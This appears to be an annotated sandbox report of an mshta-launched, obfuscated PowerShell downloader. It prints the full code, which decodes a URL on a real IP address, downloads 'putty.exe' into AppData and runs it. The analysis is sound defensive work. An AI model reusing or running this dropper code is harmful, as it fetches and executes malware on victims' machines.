
Behavioral Analysis

Process tree

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\try.hta

    2548
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted
    <#
      ANALYST NOTE (sandbox report, not a script to run): obfuscated PowerShell downloader
      passed inline on the command line by the mshta.exe parent (try.hta) in the tree above.
      Every string literal is hidden as an int[] and rebuilt by PRjCphdW, which subtracts
      36484 from each element and casts to [char]. Decoded values are given per function below.
      Observable chain: mshta.exe -> powershell.exe -ExecutionPolicy UnRestricted -> WebClient
      download -> file written under %AppData% -> launched by extension.
    #>
    <# Gcvyz: write a byte[] ($zoOJbFmnAS) to disk at $LaoDpjBOwMlJ via [IO.File]::WriteAllBytes. #>
    function Gcvyz($LaoDpjBOwMlJ, $zoOJbFmnAS){[IO.File]::WriteAllBytes($LaoDpjBOwMlJ, $zoOJbFmnAS)};
    <#
      btkgiFtctCpa: launch the dropped file, dispatching on its extension.
        @(36530,36584,36592,36592) -> ".dll"  : rundll32.exe <path>, no export name given
        @(36530,36596,36599,36533) -> ".ps1"  : a second powershell.exe -ExecutionPolicy unrestricted -File <path>
        @(36530,36593,36599,36589) -> ".msi"  : "misexec /qn /i" (sic) — not a Windows binary, presumably a
                                                typo for msiexec, so this branch would fail at run time
        anything else (the .exe case used by rWxppxCdlo) -> Start-Process <path>
    #>
    function btkgiFtctCpa($LaoDpjBOwMlJ){if($LaoDpjBOwMlJ.EndsWith((PRjCphdW @(36530,36584,36592,36592))) -eq $True){rundll32.exe $LaoDpjBOwMlJ }elseif($LaoDpjBOwMlJ.EndsWith((PRjCphdW @(36530,36596,36599,36533))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $LaoDpjBOwMlJ}elseif($LaoDpjBOwMlJ.EndsWith((PRjCphdW @(36530,36593,36599,36589))) -eq $True){misexec /qn /i $LaoDpjBOwMlJ}else{Start-Process $LaoDpjBOwMlJ}};
    <#
      TpPUOsyQfXJLytyu: fetch a payload over HTTP(S) and return it as raw bytes.
        @(36562,...,36600) -> "Net.WebClient" (New-Object by decoded type name, to dodge string matching)
        Forces [Net.SecurityProtocolType]::TLS12 before calling DownloadData($SIBwUUTjUY); the
        URL passed in below is plain http://, so TLS 1.2 is only relevant if the server redirects.
    #>
    function TpPUOsyQfXJLytyu($SIBwUUTjUY){$YwaYPEKezmd = New-Object (PRjCphdW @(36562,36585,36600,36530,36571,36585,36582,36551,36592,36589,36585,36594,36600));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$zoOJbFmnAS = $YwaYPEKezmd.DownloadData($SIBwUUTjUY);return $zoOJbFmnAS};
    <#
      PRjCphdW: string de-obfuscation helper. For each int in $QSqHdxV, emit [char](int - 36484)
      and concatenate. Re-implementing this one function is enough to recover every literal above.
    #>
    function PRjCphdW($QSqHdxV){$tebWTojh=36484;$ghByWgz=$Null;foreach($pTBqGIEAUtLRBpLo in $QSqHdxV){$ghByWgz+=[char]($pTBqGIEAUtLRBpLo-$tebWTojh)};return $ghByWgz};
    <#
      rWxppxCdlo: entry point.
        Drop path = $env:AppData + '\putty.exe' (legitimate-looking file name in a user-writable,
        non-admin location).
        If the file already exists it is simply re-launched; otherwise the encoded URL is fetched,
        written with Gcvyz and launched with btkgiFtctCpa (the .exe name lands in the Start-Process branch).
        Encoded URL @(36588,...,36585) decodes (defanged) to: hxxp://198[.]46[.]174[.]164/118/putty[.]exe
        The trailing ";;;;" are empty statements and have no effect.
    #>
    function rWxppxCdlo(){$hYcdAQxQdWFnq = $env:AppData + '\';$LsIns = $hYcdAQxQdWFnq + 'putty.exe'; if (Test-Path -Path $LsIns){btkgiFtctCpa $LsIns;}Else{ $KiwTSpCigEdN = TpPUOsyQfXJLytyu (PRjCphdW @(36588,36600,36600,36596,36542,36531,36531,36533,36541,36540,36530,36536,36538,36530,36533,36539,36536,36530,36533,36538,36536,36531,36533,36533,36540,36531,36596,36601,36600,36600,36605,36530,36585,36604,36585));Gcvyz $LsIns $KiwTSpCigEdN;btkgiFtctCpa $LsIns;};;;;}
    # Kick off the chain.
    rWxppxCdlo;

      2636
